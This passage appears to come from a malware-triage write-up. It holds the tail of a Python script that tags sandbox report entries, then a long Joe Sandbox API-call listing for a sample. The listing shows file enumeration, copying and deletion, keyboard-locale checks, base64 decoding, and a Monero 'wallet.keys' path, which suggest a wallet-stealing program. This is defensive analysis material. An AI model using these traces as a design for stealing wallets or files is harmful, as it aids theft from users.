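    if any(s.endswith("*") for s in rec.strings):
        tags.append("wildcard-enumeration")
    return tags


def triage(text: str) -> dict:
    return {rec.entry: classify(rec) for rec in parse_report(text)}


if __name__ == "__main__":
    for entry, tags in triage(SAMPLE_REPORT).items():
        print(entry, ", ".join(tags) or "-")
```

Each record is keyed by the ref of its first direct call, which is the nearest thing to a function identity the listing gives; the "Part of subcall function" lines are kept so that host-name lookups buried in a helper still count, while the loop and staging tags require direct calls so a shared helper does not tag every caller.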
                  APIs
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0064510C,?,?,?,006451B4,?,?,00000000,?,00000000), ref: 00621923
                  • StrCmpCA.SHLWAPI(?,0064525C), ref: 00621973
                  • StrCmpCA.SHLWAPI(?,00645304), ref: 00621989
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00621D40
                  • DeleteFileA.KERNEL32(00000000), ref: 00621DCA
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00621E20
                  • FindClose.KERNEL32(000000FF), ref: 00621E32
                    • Part of subcall function 0063A920: lstrcpy.KERNEL32(00000000,?), ref: 0063A972
                    • Part of subcall function 0063A920: lstrcat.KERNEL32(00000000), ref: 0063A982
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 1415058207-1173974218
                  • Opcode ID: c4821559157b96e04eeaad937492cf0f88c642d3de03541eb2cd49462e800a7b
                  • Instruction ID: 1da9cd66aeacc17a6896187ab2f48d6b910a619a7b455e1237fc284f05194ce3
                  • Opcode Fuzzy Hash: c4821559157b96e04eeaad937492cf0f88c642d3de03541eb2cd49462e800a7b
                  • Instruction Fuzzy Hash: A6128271910118ABCB59FBA0DC96EEE733AAF14300F4141ADB14A66091EF306F89DFE5
                  APIs
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00640C2E), ref: 0062DE5E
                  • StrCmpCA.SHLWAPI(?,006414C8), ref: 0062DEAE
                  • StrCmpCA.SHLWAPI(?,006414CC), ref: 0062DEC4
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0062E3E0
                  • FindClose.KERNEL32(000000FF), ref: 0062E3F2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                  • String ID: \*.*
                  • API String ID: 2325840235-1173974218
                  • Opcode ID: b08936a95af291475471de73ad5d3109fb78c66c0c3a20dc0910b1ff14d9db40
                  • Instruction ID: 5992a2865f05c161468216c63331b50672cc5603817f8a99efce80872e833441
                  • Opcode Fuzzy Hash: b08936a95af291475471de73ad5d3109fb78c66c0c3a20dc0910b1ff14d9db40
                  • Instruction Fuzzy Hash: 4DF1C271814118AADB59FBA0DC95EEE737ABF14300F4141EDB44A62091EF306F8ADF96
                  APIs
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                    • Part of subcall function 0063A920: lstrcpy.KERNEL32(00000000,?), ref: 0063A972
                    • Part of subcall function 0063A920: lstrcat.KERNEL32(00000000), ref: 0063A982
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006414B0,00640C2A), ref: 0062DAEB
                  • StrCmpCA.SHLWAPI(?,006414B4), ref: 0062DB33
                  • StrCmpCA.SHLWAPI(?,006414B8), ref: 0062DB49
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0062DDCC
                  • FindClose.KERNEL32(000000FF), ref: 0062DDDE
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID:
                  • API String ID: 3334442632-0
                  • Opcode ID: 962276701e50f57b730063428b8855e808a4930eaf05a1393f2b09ec432303ff
                  • Instruction ID: bca1b952af6062a1a1311388b30530dfd9d49aa3fecf2821c6faf83c23be56a9
                  • Opcode Fuzzy Hash: 962276701e50f57b730063428b8855e808a4930eaf05a1393f2b09ec432303ff
                  • Instruction Fuzzy Hash: F5917672900114ABCB54FBB0EC969ED737EAF94300F41866CF946A6181EE349B09DFD6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 1=,$BJ3w$PFwf$^9oy$fo~$(N$0x$5=$m~N
                  • API String ID: 0-2317833948
                  • Opcode ID: 08839abe629a68616e5bb91af8a10c051411ec06cfb4393da064bb4f615f4827
                  • Instruction ID: 3ce755b849f5d8ee225837e36efd24152dee54204697c19da9d0426a68237ba5
                  • Opcode Fuzzy Hash: 08839abe629a68616e5bb91af8a10c051411ec06cfb4393da064bb4f615f4827
                  • Instruction Fuzzy Hash: BDB25BF360C3049FE704AE2DEC8567BBBD9EB94720F1A4A3DE6C5C7344E93598018696
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: /"*$0%?w$T2};$[~v$v%-$GW$d/?$Q/
                  • API String ID: 0-3688660224
                  • Opcode ID: e09c76b4bebb84cd6111deb79cd85da9f95b68e4a8ca9cde2e1ede53df7c4e6c
                  • Instruction ID: b2bc72e528d5cd51c1ef1325ce70f818aeb22614ade0adbe1ff63ed0ad093c97
                  • Opcode Fuzzy Hash: e09c76b4bebb84cd6111deb79cd85da9f95b68e4a8ca9cde2e1ede53df7c4e6c
                  • Instruction Fuzzy Hash: D0B207F39082049FE304AE2DDC8567AF7E9EF94720F1A893DE6C4C3744EA3598458697
                  APIs
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                  • GetKeyboardLayoutList.USER32(00000000,00000000,006405AF), ref: 00637BE1
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00637BF9
                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00637C0D
                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00637C62
                  • LocalFree.KERNEL32(00000000), ref: 00637D22
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                  • String ID: /
                  • API String ID: 3090951853-4001269591
                  • Opcode ID: 497d4b73609cec96067bd9d3d7aa01215acb43ee3b58ea073edebc1a193b568f
                  • Instruction ID: 901514fe5cb8e2b2e54eed2fb2aacbb94ee4dd69148b5b9f62ea5d4029cc8f63
                  • Opcode Fuzzy Hash: 497d4b73609cec96067bd9d3d7aa01215acb43ee3b58ea073edebc1a193b568f
                  • Instruction Fuzzy Hash: 91416CB1940218ABDB64DB94DC89BEEB3B9FF44700F2041D9E00962281DB742F86CFA5
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: fR$4[_$J>~$N>~$PW{$PW{$v]}
                  • API String ID: 0-553278925
                  • Opcode ID: fc2a696fbad44a95269baef1fcb30438659ef67a7362b57db15b82f31cd13367
                  • Instruction ID: 8bd50c992b5a36558757ad1fb57b8f701f8953827413fcd568b9e6e0f4e38ed6
                  • Opcode Fuzzy Hash: fc2a696fbad44a95269baef1fcb30438659ef67a7362b57db15b82f31cd13367
                  • Instruction Fuzzy Hash: 9EB27CF3A0C2109FD3046E2DEC8567ABBE9EFD4320F1A463DEAC4C7744E93598058696
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: +[_u$<V~^$G1[$d7d+$l{z7$nL[7$wg
                  • API String ID: 0-1278952501
                  • Opcode ID: 87f93bbf8b777cab117bc2fa3de4c4f39a929fa69c823380993adbd25c7e4a46
                  • Instruction ID: 8c32e1676410cd85a51da9027073898deb113deab6f20b610894924fd6ab3330
                  • Opcode Fuzzy Hash: 87f93bbf8b777cab117bc2fa3de4c4f39a929fa69c823380993adbd25c7e4a46
                  • Instruction Fuzzy Hash: F8B227F39082049FE3046E2DEC8567AFBE9EF94720F1A493DEAC4D3744EA3558058697
                  APIs
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                    • Part of subcall function 0063A920: lstrcpy.KERNEL32(00000000,?), ref: 0063A972
                    • Part of subcall function 0063A920: lstrcat.KERNEL32(00000000), ref: 0063A982
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00640D73), ref: 0062E4A2
                  • StrCmpCA.SHLWAPI(?,006414F8), ref: 0062E4F2
                  • StrCmpCA.SHLWAPI(?,006414FC), ref: 0062E508
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0062EBDF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 433455689-1173974218
                  • Opcode ID: 9e28656e185c85ac50df2ad7a7281ee6138f9b182eb5ca5a87187f701074b338
                  • Instruction ID: 426d3121dde3ffac4963552037e967eb15004a146d0829d8ea2a4ccffd765f29
                  • Opcode Fuzzy Hash: 9e28656e185c85ac50df2ad7a7281ee6138f9b182eb5ca5a87187f701074b338
                  • Instruction Fuzzy Hash: 5812B272910118ABDB58FBA0DC96EED733AAF54300F4041ACB54AA6191EF306F49DFD6
                  APIs
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nb,00000000,00000000), ref: 00629AEF
                  • LocalAlloc.KERNEL32(00000040,?,?,?,00624EEE,00000000,?), ref: 00629B01
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nb,00000000,00000000), ref: 00629B2A
                  • LocalFree.KERNEL32(?,?,?,?,00624EEE,00000000,?), ref: 00629B3F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptLocalString$AllocFree
                  • String ID: Nb
                  • API String ID: 4291131564-695727715
                  • Opcode ID: f618bf82f1ecf21b805bf2df6be17b7d5ad1b7dbaa83d5c023e14fc9b8458089
                  • Instruction ID: 24617564107337e6753dc951c18f0eb380cf0767159d1846c51cacbd0f9fa330
                  • Opcode Fuzzy Hash: f618bf82f1ecf21b805bf2df6be17b7d5ad1b7dbaa83d5c023e14fc9b8458089
                  • Instruction Fuzzy Hash: FA11A2B4240208AFEB14CFA4DC95FAA77B5FB89701F208058F9159B390C7B6A901DFA0
                  APIs
                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0062C871
                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0062C87C
                  • lstrcat.KERNEL32(?,00640B46), ref: 0062C943
                  • lstrcat.KERNEL32(?,00640B47), ref: 0062C957
                  • lstrcat.KERNEL32(?,00640B4E), ref: 0062C978
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$BinaryCryptStringlstrlen
                  • String ID:
                  • API String ID: 189259977-0
                  • Opcode ID: dd2435ba842f08e37bc39077c8cf4502df75a9980935fdc696dcf4e655535911
                  • Instruction ID: 2eb78101319461c26e605136bd4c2524585e67a0918929ce6e3bc6619f49306f
                  • Opcode Fuzzy Hash: dd2435ba842f08e37bc39077c8cf4502df75a9980935fdc696dcf4e655535911
                  • Instruction Fuzzy Hash: E64151B5D0421ADBDB14DF94DD89BEEB7B9BB44304F1041A8E609B7280D7719A84CF91
                  APIs
                  • GetSystemTime.KERNEL32(?), ref: 0063696C
                  • sscanf.NTDLL ref: 00636999
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006369B2
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006369C0
